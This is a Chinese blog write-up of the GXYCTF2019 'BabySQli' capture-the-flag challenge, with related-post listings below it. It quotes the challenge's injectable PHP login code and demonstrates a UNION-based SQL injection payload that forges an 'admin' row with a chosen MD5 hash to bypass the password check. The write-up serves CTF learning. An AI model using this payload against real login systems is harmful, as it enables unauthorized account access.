GXYCTF2019 babysqli

最新推荐文章于 2024-06-15 18:38:29 发布
最新推荐文章于 2024-06-15 18:38:29 发布
阅读量282 收藏 1
点赞数 1
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/120183207
版权

SQL注入 MD5验证 联合查询 信息绕过 安全漏洞
关键词由CSDN通过智能技术生成

1NDEX

0x00 初试

一开始以为普通sql注入题
在这里插入图片描述
fuzz一下没过滤什么东西
or大小写直接绕过就行,但两个括号绕过之前倒没遇上过,尝试了各种编码好像也没用…
联合查询出有三列

在这里插入图片描述
那串注释是base32 ->base64 decode之后是
select * from user where username = ‘$name’

其实通过这个hint就应该意识到了,查询时只用到了username
password的校验显然不再同一处

显然直接通过注入查询不太可能了,是新东西,看个wp学习一下
该题考查绕过密码的MD5验证,不看源码 or wp我是真不会想到的…

0x01 复现

方便理解贴一下源码

$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);


if(preg_match("/\(|\)|\=|or/", $name)){
	die("do not hack me!");
}
else{
	if (!$result) {
		printf("Error: %s\n", mysqli_error($con));
		exit();
	}
	else{
		// echo '<pre>';
		$arr = mysqli_fetch_row($result);
		// print_r($arr);
		if($arr[1] == "admin"){
			if(md5($password) == $arr[2]){
				echo $flag;
			}
			else{
				die("wrong pass!");
			}
		}
		else{
			die("wrong user!");
		}
	}
}

Tip
联合查询不存在数据时,会自动构建一个虚拟数据
&&这个虚拟数据是包含在结果集里面的

Local test一下

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
+----+----------+------------+
13 rows in set (0.01 sec)

mysql> select * from users where username='2' union select 1,'admin',5 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | admin    | 5        |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where username='admin' union select 1,'admin',5 ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  8 | admin    | admin    |
|  1 | admin    | 5        |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql>

当我第一段查询不存在时,直接显示联合查询中的虚拟数据
第一段查询数据存在时,结果集先返回存在的数据
再返回一行虚拟数据

order by 4 报错–>只有三列

判断username在哪一列的方法

进行用联合注入,回显wrong user!,说明用户不在第一列

1' union select 1,2,3#

尝试将用户名放在第二列,回显wrong pass!,找到用户名在第二列

1' union select 1,'admin',3#

brain.md

首先查询一个不存在的username再联合查询我们自己构建的虚拟数据
那么结果集中仅存在我们的虚拟数据
(一个小坑 password是md5加密的,当然这算一般经验了)
这样在不知道admin原密码的情况下绕过了验证
payload:
name=1’union select 1,‘admin’,‘202cb962ac59075b964b07152d234b70’#&pw=123

md5(123)=202cb962ac59075b964b07152d234b70
此处可自己组合
在这里插入图片描述
done!

参考

https://www.cnblogs.com/gaonuoqi/p/12355035.html
https://blog.csdn.net/RABCDXB/article/details/113812068

0x02 rethink

常规思路走不通时,要学会变化。
还是碰的太少,见得太少,经验不足。

k_du1t
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[GXYCTF2019] web题-BabySQli
BROTHERYY的博客
07-13 636
复现环境:buuoj.cn 查看页面源代码发现有个search.php,访问这个文件以后发现有base32编码 在网上对其解码后得到 在登录发现存在账号admin,使用联合查询 联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。这时候直接在pass框里面输入e10adc3949ba59abbe56e057f20f883e的md5解密结果就可以了。 flag{360b0328-2477-4a68-801b-4f3fed8217a0} ...
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1478
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
[GXYCTF2019]BabySQli
devilare的博客
05-18 424
[GXYCTF2019]BabySQli 刷题笔记 随便登录试试 好像是有admin这个用户名(一般都有QAQ),加入单引号,爆出错误,加入常规操作发现始终回显一样,看看源代码 MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 百度一下,会发现这个是base32+base64加密得到的,解密后得到select * from user whe...
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1459
[GXYCTF 2019]BabySqli
BUUCTF[GXYCTF2019]BabySQli
最新发布
firecjh的博客
06-15 312
筛选有用的代码,发现代码赋值$result时使用了mysqli_query()函数,这个函数用于执行某个针对数据库的查询并且规定只能查询字符串,证明了上面的猜测,从代码中可以发现$arr使用了mysqli_fetch_row函数,将所有返回结果作为枚举数组,所有返回结果又是从数据库中查询出来的,说明数组的值和数据库的值相同,那么查询数据库的值时也相当于在查数组的值,由于之前返回了联合查询时返回了wrong pass!发现成功返回flag。
[GXYCTF2019]BabySQli 解题思路&过程
iamblackcat's blog
10-19 4813
[GXYCTF2019]BabySQli 解题思路&过程
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...
[gxyctf2019]babysqli
03-16
"babysqli" 是一个 SQL 注入的题目,通常用于漏洞挖掘和安全测试目的。它通常包含一个网页表单,该表单将用户输入的数据插入到 SQL 查询中,如果网站没有正确地过滤和验证用户输入,那么攻击者可能能够通过注入恶意 ...
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 96
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
[GXYCTF2019]BabySQli sql注入
m0_46412682的博客
08-12 724
[GXYCTF2019]BabySQli sql注入 1、输入单引号’ 2、猜有多少字段 1’ order by 3# 看来又过滤,那就用bp抓包fuzz 导入字典 3、经测试过滤了or order =等字符,但是没有过滤union select,可以通过select猜有多少字段 1’ union select 1,2,3,4# 1’ union select 1,2,3# ,返回wrong user,说明有三个字段 但是在源代码中有一串数字 MMZFM422K5HDASKDN5TVU3S
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值